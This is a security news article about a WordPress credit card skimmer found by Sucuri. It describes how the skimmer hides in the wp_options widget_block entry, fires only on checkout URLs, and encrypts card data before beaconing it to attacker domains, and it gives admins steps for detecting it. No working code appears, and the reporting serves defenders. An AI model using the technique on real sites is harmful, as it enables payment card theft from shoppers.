A new breed of credit card skimming malware has been discovered, targeting WordPress checkout pages with alarming sophistication. Puja Srivastava, a Security Analyst at Sucuri, highlights the stealthy tactics employed by this malware, emphasizing its ability to evade detection and silently siphon sensitive payment details.
Unlike traditional attacks that compromise themes or plugins, this malware embeds itself within the WordPress database. Specifically, it uses the wp_options table, injecting obfuscated JavaScript into the widget_block entry. Srivastava explains, “By injecting itself into the database rather than theme files or plugins, the malware avoids detection by common file-scanning tools. This allows it to persist quietly on compromised WordPress sites.”
Once activated, the malware targets checkout pages, either hijacking existing payment forms or dynamically creating fake forms to deceive users into providing their payment details.
The malware uses clever conditional logic to trigger only on pages containing “checkout” in their URLs, avoiding detection on other parts of the site. It captures sensitive data such as credit card numbers, CVVs, and billing addresses in real time.
“If a legitimate payment form is already on the page, the script captures data entered into these fields in real time,” Srivastava notes.
To exfiltrate the stolen data, the malware employs a combination of Base64 encoding and AES-CBC encryption, masking the information during transit. The data is silently sent to attacker-controlled domains like valhafather[.]xyz and fqbe23[.]xyz using the navigator.sendBeacon function, ensuring minimal disruption to the user experience.
This attack is particularly dangerous because it operates in the background without altering the checkout process. Visitors remain unaware that their payment details have been compromised. Srivastava warns, “What makes it especially deceptive is that it operates in the background without affecting the normal checkout process.”
Such stolen information is often used for fraudulent transactions or sold on underground markets, exacerbating the impact of the breach.
Sucuri’s SiteCheck tool has been updated to detect this malware, flagging it as malware.magento_shoplift.273. Srivastava recommends administrators inspect Custom HTML Widgets in WordPress for suspicious scripts:
- Log into your WordPress admin panel.
- Navigate to wp-admin > Appearance > Widgets.
- Check all Custom HTML block widgets for unfamiliar <script> tags.
Related Posts:
- PHP Reinfector Malware Wreaks Havoc on WordPress Sites
- Credit Card Skimmer Malware Uncovered: Targeting Magento Checkout Pages
- Cybercriminals Exploit Swap Files: New E-commerce Skimming Tactic
- Some U.S banks ban the use of credit cards to buy cryptocurrency
